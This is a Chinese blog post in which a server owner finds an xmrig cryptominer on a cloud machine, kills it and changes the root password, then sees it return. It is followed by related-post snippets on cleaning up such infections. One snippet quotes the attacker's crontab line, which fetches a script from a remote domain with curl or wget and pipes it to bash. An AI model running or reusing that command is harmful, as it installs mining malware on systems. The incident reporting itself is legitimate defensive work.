无意间发现我的一台云服用器中了矿机xmrig的毒,哎!!

最新推荐文章于 2025-09-10 21:57:45 发布
原创 最新推荐文章于 2025-09-10 21:57:45 发布 · 3.4w 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xmrig

博主发现自己的服务器被不明Xmrig进程占用大量CPU资源进行挖矿,紧急采取措施终止进程并更改root密码,但次日发现挖矿行为再次出现。文章详细记录了这一过程及后续处理。

矿机自己平时用来做测试的一台机器,所以也没做什么防护,今天上去无意见看到有一个xmrig进程cpu 99%,

Xmrig是啥?

原来是矿机,还用的root干的,我花的银子买的机器,天天给人挖矿,   好不爽啊!!!

看一下在哪里

/proc/27336/exe

都跑一个月了。。。。

kill -9 27336  先灭了再说!

吓得我赶紧修改root密码

还没完,第二天,我上服务器看了一下,又挖起来了(意料之内,这玩意不会那么low,清了就没了)。。。。。

接下无意间发现我的一台云服用器中了矿机xmrig的毒,续!!

 

 

 

最新挖矿病xmrig清除方法和原理
m0_73140589的博客
03-21 7621
手机端接收短信提醒,服务正遭受挖矿病攻击,服务的cpu和内存占用高,阿里不断告警
xmrig-setup:xmrig矿工
04-02
xmrig设置 xmrig矿工
根除矿机xmrig
qq_19582693的博客
07-28 7168
根除xmrig矿机
记录一次腾讯木马攻击
wenzhenyu1990的专栏
05-24 1154
客户服务运行越来越慢,今天居然挂了,上服务去看free -h 发现服务内存消耗巨大,top查看果然xmrig以及.libs进程消耗掉了大部分cpu和内存。 直接kill发现还是会继续存在 于是执行crontab -l 发现 30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh 下载 http://w.apacheo...
xmrig开发路线图:未来版本功能预测
最新发布
gitblog_01048的博客
09-10 354
xmrig作为一款支持RandomX、KawPow、CryptoNight和GhostRider等多算法的CPU/GPU统一计算软件,已成为区块链计算领域的核心工具之一。自2018年首次发布以来,该项目通过150+版本迭代,实现了从单一算法支持到跨平台多硬件适配的技术跃迁,目前已支持x86/ARM架构、Windows/Linux/macOS全平台及CUDA/OpenCL异构计算。本文基于近三年版本...
linux服务挖矿程序xmrig入侵以及解决方案
热门推荐
weixin_46575363的博客
09-03 1万+
记一次Xmrig挖矿木马排查过程 2021年9月2日晚上,突然收到阿里的一条短信,说是服务被挖矿软件入侵了,马上打开电脑查看 控制台CPU占用 原因分析与解决方案 寻找原因 查找挖矿进程 top -H 从图上我们可以找到CPU占用100%的进行名为xmrig(甚至都不伪装一下进程名) 查找挖矿程序文件位置 root@xxx:/# find / -name ‘xmrig’ /root/.c3pool/xmrig --config=/root/.c3pool/config.json 我们尝试kill掉
清理linux上c3pool挖矿病xmrig
sulei627719296的博客
04-25 2158
因为kill -9杀掉进程之后会立即重启,需找到自启动服务,禁用后删除。检查是否有相关的定时任务,如果有定时任务则删除掉。找到所有相关的服务,全部删除。
阿里轻量服务xmrig挖矿病排查处理
ZHUMUYI0的博客
12-04 2325
本人的轻量服务没有在运行的应用,纯用来当部署用的公网测试机,突然发现其中一颗CPU核心使用率已经到100。
matlab.zip_Mine!_matlab露天矿_vehicle_露天
09-23
描述中的“‘露天矿生产的车辆安排’的模型和评述 ‘Model and review of vehicle arrangement’ open pit mine production”表明,此压缩包可能包含一个MATLAB模型,该模型设计用于规划和评估露天矿作业中车辆的...
记一次 Linux 被入侵,服务变“矿机”全过程.docx
12-25
记一次 Linux 被入侵,服务变“矿机”全过程
芯动科技取消 Grin 矿机销售计划 愿意出售产品完整设计方案
01-20
芯动科技,一家知名的矿机生产商,近期宣布取消其Grin矿机的销售计划,这一决定源于定制芯片G32 GPU ASIC的生产过程中遇到的困难。由于芯片的高复杂度和第三方代工厂的量产延误,芯动科技无法按原计划在一月和二月向...
露天矿领域采用空中采矿机的探索与研究
05-31
空中采矿机设想的提出,充分整合采掘、运输及排弃环节为一体,可以大幅缩减露天矿的运营成本、降低安全压力。露天矿的主要成本来自卡车运输,采用空中采矿机可以不用卡车运输,连续作业;大幅缩减露天矿的用工数量,可以...
服务xmrig处理
m0_46495271的博客
01-18 1275
一般这种病都会有一个定时脚本来维护病执行的。使用 top 获取 xmrig 进程ID。查看与 xmrig 进程运行相关的文件。把该目录下的文件全部删除。
服务CPU一直高占用,病排查,服务被黑,服务中挖矿病,挖矿机xmrig排查及解决
zhazha0807的博客
03-04 5289
收到阿里发来的通知“【挖矿处置通知】请尽快整改服务挖矿活动”,"经检测您的阿里服务上存在疑似挖矿活动……";盖帽的话不说了,直接上排查思路及解决方法; 1、先用top命令查看一下服务资源情况,发现一个进程一直持续cpu:200%;记录下pid。然后先skill 掉试试,cpu恢复正常后,马上又启动了新进程; 2、然后推测是有定时任务或者某些机制进行触发的启动,先检测一下定时任务: 这里注意使用:crontab -l 查询到无定时任务,然后由于进程的User是 git ,然后换成: cro
阿里服务xmrig
qq_35692783的博客
09-27 1536
今天访问服务的时候,命令输入很慢,于是输入top查看进程运行情况,发现有个名叫xmrig的进程占用CPU占90+%以上。 百度查了一下发现是挖矿的,应该是上次安装redis后没设置访问密码的原因。 先是尝试用 kill -9 进程ID 杀掉,结果又有新的xmrig产生了,于是就查看这个进程的执行文件在哪里,然后把这个目录下的文件全都删掉。 /proc/进程ID/exe rm -rf /root/.c3pool 输入top之后发现还存在,再次尝试kill,成功杀死并且没有新的进程产生了。 网上说可能
服务遭遇xmrig挖矿病
康小虎的博客
12-25 4503
发现问题: 在自己买的阿里服务上部署的项目之前就偶尔会自己kill掉,一直没有在意,重启项目后继续使用。但是昨天重启后一直被kill掉,根本没法正常启动,用top命令看了一下,发现一个奇怪的进程一直占用CPU在50%左右,然后去阿里控制台看了一下,最近一个月CPU使用率几乎都接近100%。最后上网查了一下,xmrig是一款挖矿病 解决问题: 百度了一下暂时解决了,基本跟阿里给的方案一样。直接看看阿里售后的说法: 1、首先看一下为什么阿里没有安全提示 ![在这里插入图片描述](https:/
无意间发现我的一台服用中了矿机xmrig,续!!
kevin的博客
06-13 1万+
接上 无意间发现我的一台服用中了矿机xmrig,哎!! 上次没根除接着来! 看一下是不是设置了定时任务:这里要注意一下,我一开始 crontab的时候没有指定用户(我是用ubuntu用户登陆的),没有看到这个任务,以为没有问题,不指定用户列出的是当前用户的任务,编辑也是同样如此. 果然,去下载了一脚本执行! 打开看看 就是你了! 这段脚本也比较简单好理解大概意思:清清本地...
## 记录一次简单的xmrig挖矿程序清理
qq_42422547的博客
05-11 4783
记录一次简单的xmrig挖矿程序清理 晚上闲着没事逛逛网站无意间发现cpu居然一直处于99.9的状态。 5.9 linux服务,2核4G contos 7 小白一枚,还在纳闷是什么东西占了这么多的资源开始排查 1.使用putty登录后,top命令查看占用比较高的进程是啥,打开发现xmrig这个进程,查了下资料说这个是个挖矿程序, 2,记下它的进程号去找文件位置 ls -l /proc/进程ID/exe 查看进程文件的位置 3,杀掉进程 kill -9 进程id 删除进程文件。 对于处理这种事情
【安全】查杀linux上c3pool挖矿病xmrig
飞的博客
03-05 3129
来源安装脚本旷池提供的卸载脚本。
评论 5
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值